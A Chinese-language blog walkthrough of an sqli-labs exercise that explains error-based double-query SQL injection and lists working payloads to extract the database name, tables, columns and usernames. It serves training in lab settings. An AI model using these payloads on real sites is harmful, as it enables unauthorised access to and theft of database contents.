先从老套路开始——
?id=1无报错,?id=1' 发现有报错!根据返回的语法错误可以判断是字符型
再然后可以判断出列数:?id=1' order by 3%23
然后按照套路,下一步应该是联合查询,可惜没有回显,这条路到这儿已经走到头了。
但是!但是!我们可以看看我们还有什么:1、语法错误仍然会显示出来2、You are in...的存在与否仍然可以帮助我们判断查询是否有正确
基于以上两点,就有了两种注入方式:
1、双注入(只要能回显语法错误,这种方式仍可使用,这种方式也是作者想考察的注入方式)
2、基于错误的盲注(根据You are in...的有无我们可以进行字符猜解,这需要python脚本)
方式一:双注入
原理这样大佬已经讲得非常清楚了:https://www.2cto.com/article/201303/192718.html
我只说重要的几点:
1、整条语句的构造,都是基于一个基本原理:聚合函数(count)和分组函数(group)在一起会报错!阅读时牢牢把握住这根主脉络即可。
2、整个语句,能否报错成功,是有概率的,得多试几次
3、构造payload时要注意:根据order by 3%23查出来列数为3,要注意匹配
但有个问题我一直没想明白——为什么是有概率,有办法提高概率?
基于聚合分组函数的双注入
下面是payload:
1、爆库名:
?id=1' union select 1,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.columns group by a%23
2、爆表名:
?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.columns group by a%23
将从limit 0,1依次变到limit 3,1即可爆出所有的表
3、爆列名:
?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand()*2)) as a from information_schema.columns group by a%23
4、爆内容:
?id=1' union select 1,count(*),concat((select username from security.users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a%23
在此特别鸣谢:
http://120.79.189.7/?p=83
https://blog.csdn.net/u012763794/article/details/51207833
https://www.2cto.com/article/201303/192718.html
https://hellohxk.com/blog/sqli-labs/